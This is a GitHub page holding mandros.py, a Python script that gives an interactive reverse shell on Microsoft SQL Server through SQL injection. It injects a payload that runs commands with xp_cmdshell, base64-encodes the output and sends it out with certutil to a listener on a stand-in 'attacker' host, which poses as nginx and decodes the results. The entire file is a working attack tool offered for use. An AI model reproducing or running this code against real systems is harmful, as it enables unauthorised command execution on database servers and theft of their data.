-
Notifications
You must be signed in to change notification settings - Fork 6
/
mandros.py
136 lines (106 loc) · 3.26 KB
/
mandros.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
'''
query_id = 0
target_url = "http://target/vulnerable.asp"
local_url = "http://attacker/"
local_port = 80
'''
Decoding functions
'''
b64_padding = lambda x: x.ljust(len(x) + (4 - len(x) % 4), '=')
def base64_dec(x):
try:
res = b64_padding(x).decode('base64')
except:
# Command output got truncated
if len(x)%4 > 0:
x = x[:-(len(x)%4)]
res = x.decode('base64')
return res
def decode(data):
parser = HTMLParser.HTMLParser()
try:
# We don't like Unicode strings, do we?
html = base64_dec(data).replace(chr(0),'')
except:
return '[-] decoding error'
return parser.unescape(html)
'''
Get command from stdin
'''
def get_command():
try:
cmd = raw_input(':\> ')
t = threading.Thread(target=send_command, args=(cmd,))
t.start()
except:
sys.exit(0)
'''
Create payload and send command: adapt this function to your needs
'''
def send_command(cmd):
global target_url, local_url
payload = "';"
payload += "declare @r varchar(4120),@cmdOutput varchar(4120);"
payload += "declare @res TABLE(line varchar(max));"
payload += "insert into @res exec xp_cmdshell '%s';"
payload += "set @cmdOutput=(select (select cast((select line+char(10) COLLATE SQL_Latin1_General_CP1253_CI_AI as 'text()' from @res for xml path('')) as varbinary(max))) for xml path(''),binary base64);"
payload += "set @r=concat('certutil -urlcache -f %s',@cmdOutput);"
payload += "exec xp_cmdshell @r;"
payload += "--"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"
h = {'User-Agent':user_agent}
# Customize from here
p = {
'param1':'foo',
'param2':'bar',
'vulnerable_param':payload % (cmd, local_url)
}
requests.get(target_url, headers=h, params=p)
'''
Custom HTTPServer
'''
class MyServer(HTTPServer):
def server_activate(self):
# get first command
get_command()
HTTPServer.server_activate(self)
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def log_request(self, *args, **kwargs):
return
def log_message(self, *args, **kwargs):
return
def do_GET(self):
global query_id
self.send_error(404)
# Certutil sends 2 requets each time
if query_id % 2 == 0:
output = self.path
# if command output, decode it!
if output != '/':
print decode(output[1:])
# get next command
get_command()
query_id += 1
'''
Main
'''
if __name__ == '__main__':
# Fake server behaviour
handler = SimpleHTTPRequestHandler
handler.server_version = 'nginx'
handler.sys_version = ''
handler.error_message_format = 'not found'
# Add SSL support if you wanna be a ninja!
httpd = MyServer(('0.0.0.0', local_port), handler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()